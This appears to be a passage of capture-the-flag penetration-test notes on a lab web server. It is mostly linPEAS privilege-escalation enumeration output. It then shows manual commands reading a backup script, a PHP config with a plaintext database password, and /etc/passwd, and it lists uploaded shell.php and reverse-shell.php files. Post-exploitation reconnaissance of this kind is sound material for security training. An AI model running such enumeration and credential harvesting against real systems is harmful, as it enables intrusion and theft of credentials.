ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 71958 Feb 13 2021 /etc/php/7.3/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71570 Feb 13 2021 /etc/php/7.3/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Mar 15 2019 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/ldap
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 174 May 29 2021 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 94 May 29 2021 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 394 May 29 2021 /etc/ssh/ssh_host_rsa_key.pub
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
/etc/ssl/certs/CFCA_EV_ROOT.pem
/etc/ssl/certs/COMODO_Certification_Authority.pem
/etc/ssl/certs/COMODO_ECC_Certification_Authority.pem
2255PSTORAGE_CERTSBIN
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/pam.d
-rw-r--r-- 1 root root 2133 Jan 31 2020 /etc/pam.d/sshd
account required pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so motd=/run/motd.dynamic
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 May 29 2021 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 3 root root 4096 Oct 15 2020 /usr/share/phpmyadmin/vendor/google/recaptcha/.github
drwxr-xr-x 2 root root 4096 Oct 15 2020 /usr/share/phpmyadmin/vendor/phpmyadmin/motranslator/.github
drwxr-xr-x 2 root root 4096 Oct 15 2020 /usr/share/phpmyadmin/vendor/tecnickcom/tcpdf/.github
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 8700 Mar 16 2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 16 2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Mar 16 2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 7443 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 8700 Mar 16 2021 /usr/share/keyrings/debian-archive-bullseye-automatic.gpg
-rw-r--r-- 1 root root 8709 Mar 16 2021 /usr/share/keyrings/debian-archive-bullseye-security-automatic.gpg
-rw-r--r-- 1 root root 2453 Mar 16 2021 /usr/share/keyrings/debian-archive-bullseye-stable.gpg
-rw-r--r-- 1 root root 8132 Mar 16 2021 /usr/share/keyrings/debian-archive-buster-automatic.gpg
-rw-r--r-- 1 root root 8141 Mar 16 2021 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
-rw-r--r-- 1 root root 2332 Mar 16 2021 /usr/share/keyrings/debian-archive-buster-stable.gpg
-rw-r--r-- 1 root root 55625 Mar 16 2021 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 36873 Mar 16 2021 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 7443 Mar 16 2021 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7452 Mar 16 2021 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2263 Mar 16 2021 /usr/share/keyrings/debian-archive-stretch-stable.gpg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Mar 1 2019 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5851 May 29 2021 /etc/vsftpd.conf
anonymous_enable=YES
local_enable=YES
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
-rw-r--r-- 1 root root 41 Jun 18 2015 /usr/lib/tmpfiles.d/vsftpd.conf
-rw-r--r-- 1 root root 506 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 564 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 260 Feb 1 2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
anonymous_enable
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 69 Feb 13 2021 /etc/php/7.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Feb 13 2021 /usr/share/php7.3-common/common/ftp.ini
╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 856 Mar 1 2019 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 856 Mar 1 2019 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Windows Files (limit 70)
lrwxrwxrwx 1 root root 22 May 29 2021 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
lrwxrwxrwx 1 root root 24 May 29 2021 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 83 May 29 2021 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 Apr 18 2019 /etc/skel/.bashrc
-rw-r--r-- 1 grimmie administrator 3526 May 29 2021 /home/grimmie/.bashrc
-rw-r--r-- 1 root root 807 Apr 18 2019 /etc/skel/.profile
-rw-r--r-- 1 grimmie administrator 807 May 29 2021 /home/grimmie/.profile
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
- /usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
- /usr/local/lib/x86_64-linux-gnu
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu
/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
══╣ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 Feb 10 2019 usr.bin.man
-rw-r--r-- 1 root root 730 Nov 25 2020 usr.sbin.mysqld
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 20
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 664 Mar 1 2019 bash_completion.sh
-rw-r--r-- 1 root root 1107 Sep 14 2018 gawk.csh
-rw-r--r-- 1 root root 757 Sep 14 2018 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
/var/www/html
/var/www/html/index.html
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/lib/phpmyadmin
/var/lib/phpmyadmin/tmp
/var/lib/phpmyadmin/tmp/twig
/var/tmp
/var/www/html/academy
/var/www/html/academy/admin
/var/www/html/academy/admin/assets
/var/www/html/academy/admin/assets/css
/var/www/html/academy/admin/assets/css/bootstrap.css
/var/www/html/academy/admin/assets/css/font-awesome.css
/var/www/html/academy/admin/assets/css/style.css
/var/www/html/academy/admin/assets/fonts
/var/www/html/academy/admin/assets/fonts/FontAwesome.otf
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.eot
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.ttf
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.woff
/var/www/html/academy/admin/assets/fonts/fontawesome-webfont.woff2
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/admin/assets/img
/var/www/html/academy/admin/assets/js
/var/www/html/academy/admin/assets/js/bootstrap.js
/var/www/html/academy/admin/assets/js/jquery-1.11.1.js
/var/www/html/academy/admin/change-password.php
/var/www/html/academy/admin/check_availability.php
/var/www/html/academy/admin/course.php
/var/www/html/academy/admin/department.php
/var/www/html/academy/admin/edit-course.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/admin/includes/config.php
/var/www/html/academy/admin/includes/footer.php
/var/www/html/academy/admin/includes/header.php
/var/www/html/academy/admin/includes/menubar.php
/var/www/html/academy/admin/index.php
/var/www/html/academy/admin/level.php
/var/www/html/academy/admin/logout.php
/var/www/html/academy/admin/manage-students.php
/var/www/html/academy/admin/print.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/assets
/var/www/html/academy/assets/css
/var/www/html/academy/assets/css/bootstrap.css
/var/www/html/academy/assets/css/font-awesome.css
/var/www/html/academy/assets/css/style.css
/var/www/html/academy/assets/fonts
/var/www/html/academy/assets/fonts/FontAwesome.otf
/var/www/html/academy/assets/fonts/fontawesome-webfont.eot
/var/www/html/academy/assets/fonts/fontawesome-webfont.ttf
/var/www/html/academy/assets/fonts/fontawesome-webfont.woff
/var/www/html/academy/assets/fonts/fontawesome-webfont.woff2
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/assets/img
/var/www/html/academy/assets/js
/var/www/html/academy/assets/js/bootstrap.js
/var/www/html/academy/assets/js/jquery-1.11.1.js
/var/www/html/academy/change-password.php
/var/www/html/academy/check_availability.php
/var/www/html/academy/db
/var/www/html/academy/db/onlinecourse.sql
/var/www/html/academy/enroll-history.php
/var/www/html/academy/enroll.php
/var/www/html/academy/includes
/var/www/html/academy/includes/config.php
/var/www/html/academy/includes/footer.php
/var/www/html/academy/includes/header.php
/var/www/html/academy/includes/menubar.php
/var/www/html/academy/index.php
/var/www/html/academy/logout.php
/var/www/html/academy/my-profile.php
/var/www/html/academy/pincode-verification.php
/var/www/html/academy/print.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/academy/studentphoto/reverse-shell.php
/var/www/html/academy/studentphoto/script.php
/var/www/html/academy/studentphoto/shell.php
/var/www/html/academy/studentphoto/tmp
/var/www/html/academy/studentphoto/tmp/linpeas.sh
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
╔══════════╣ Unexpected in /opt (usually empty)
total 11332
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 18 root root 4096 May 29 2021 ..
-rw-r--r-- 1 root root 1402271 Jun 3 2020 online-course-registration.zip
-rw-r--r-- 1 root root 10190261 Oct 15 2020 phpMyAdmin-4.9.7-all-languages.tar.gz
╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img
/initrd.img.old
/vmlinuz.old
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/syslog
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/www-data (limit 20)
╔══════════╣ Files inside others home (limit 20)
/home/grimmie/.bash_history
/home/grimmie/.bashrc
/home/grimmie/backup.sh
/home/grimmie/.profile
/home/grimmie/.bash_logout
/var/www/html/index.html
/var/www/html/academy/logout.php
/var/www/html/academy/enroll.php
/var/www/html/academy/check_availability.php
/var/www/html/academy/my-profile.php
/var/www/html/academy/change-password.php
/var/www/html/academy/print.php
/var/www/html/academy/studentphoto/tmp/linpeas.sh
/var/www/html/academy/studentphoto/shell.php
/var/www/html/academy/studentphoto/reverse-shell.php
/var/www/html/academy/studentphoto/script.php
/var/www/html/academy/studentphoto/boys-profile-picture-screenshot.jpg
/var/www/html/academy/studentphoto/avatar-1.jpg.png
/var/www/html/academy/studentphoto/noimage.png
/var/www/html/academy/includes/footer.php
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rwxr-xr-- 1 grimmie administrator 112 May 30 2021 /home/grimmie/backup.sh
-rw-r--r-- 1 root root 9716 Nov 28 2020 /usr/lib/modules/4.19.0-13-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9731 Mar 19 2021 /usr/lib/modules/4.19.0-16-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 363752 Apr 30 2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 348 Nov 25 2020 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rwxr-xr-x 1 root root 38412 Nov 25 2020 /usr/bin/wsrep_sst_mariabackup
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K May 29 2021 .
drwxr-xr-x 12 root root 4.0K May 29 2021 ..
drwxr-xr-x 3 root root 4.0K May 29 2021 html
/var/www/html:
total 24K
drwxr-xr-x 3 root root 4.0K May 29 2021 .
drwxr-xr-x 3 root root 4.0K May 29 2021 ..
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 grimmie administrator 220 May 29 2021 /home/grimmie/.bash_logout
-rw-r--r-- 1 root root 946 Oct 15 2020 /usr/share/phpmyadmin/vendor/pragmarx/google2fa/.scrutinizer.yml
-rw-r--r-- 1 root root 799 Oct 15 2020 /usr/share/phpmyadmin/vendor/twig/twig/.php_cs.dist
-rw-r--r-- 1 root root 224 Oct 15 2020 /usr/share/phpmyadmin/vendor/twig/twig/.editorconfig
-rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root root 0 Jul 23 01:28 /run/network/.ifstate.lock
-rw------- 1 root root 0 May 29 2021 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 18 2019 /etc/skel/.bash_logout
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
╔══════════╣ Searching passwords in history files
Binary file /usr/share/phpmyadmin/js/vendor/openlayers/theme/default/img/navigation_history.png matches
╔══════════╣ Searching passwords in config PHP files
/usr/share/phpmyadmin/config.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/config.sample.inc.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:$cfg['Servers'][$i]['AllowNoPassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:$cfg['ShowChgPassword'] = true;
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
/var/www/html/academy/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder
/usr/lib/x86_64-linux-gnu/mariadb19/plugin/mysql_clear_password.so
/usr/lib/x86_64-linux-gnu/mariadb19/plugin/simple_password_check.so
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/usr/share/phpmyadmin/user_password.php
/var/cache/debconf/passwords.dat
/var/lib/pam/password
/var/www/html/academy/admin/change-password.php
/var/www/html/academy/change-password.php
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
2021-05-29 17:00:10 install base-passwd:amd64 <none> 3.5.46
2021-05-29 17:00:10 status half-installed base-passwd:amd64 3.5.46
2021-05-29 17:00:11 configure base-passwd:amd64 3.5.46 3.5.46
2021-05-29 17:00:11 status half-configured base-passwd:amd64 3.5.46
2021-05-29 17:00:11 status installed base-passwd:amd64 3.5.46
2021-05-29 17:00:11 status unpacked base-passwd:amd64 3.5.46
2021-05-29 17:00:18 status half-configured base-passwd:amd64 3.5.46
2021-05-29 17:00:18 status half-installed base-passwd:amd64 3.5.46
2021-05-29 17:00:18 status unpacked base-passwd:amd64 3.5.46
2021-05-29 17:00:18 upgrade base-passwd:amd64 3.5.46 3.5.46
2021-05-29 17:00:21 install passwd:amd64 <none> 1:4.5-1.1
2021-05-29 17:00:21 status half-installed passwd:amd64 1:4.5-1.1
2021-05-29 17:00:21 status unpacked passwd:amd64 1:4.5-1.1
2021-05-29 17:00:24 configure base-passwd:amd64 3.5.46 <none>
2021-05-29 17:00:24 status half-configured base-passwd:amd64 3.5.46
2021-05-29 17:00:24 status installed base-passwd:amd64 3.5.46
2021-05-29 17:00:24 status unpacked base-passwd:amd64 3.5.46
2021-05-29 17:00:25 configure passwd:amd64 1:4.5-1.1 <none>
2021-05-29 17:00:25 status half-configured passwd:amd64 1:4.5-1.1
2021-05-29 17:00:25 status installed passwd:amd64 1:4.5-1.1
2021-05-29 17:00:25 status unpacked passwd:amd64 1:4.5-1.1
Description: Set up users and passwords
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
Notes
-rwxr-xr-- 1 grimmie administrator 112 May 30 2021 /home/grimmie/backup.sh
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
cat /home/grimmie/backup.sh
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
cat /var/www/html/academy/includes/config.php
<?php
$mysql_hostname = "localhost";
$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";
$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");
?>
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
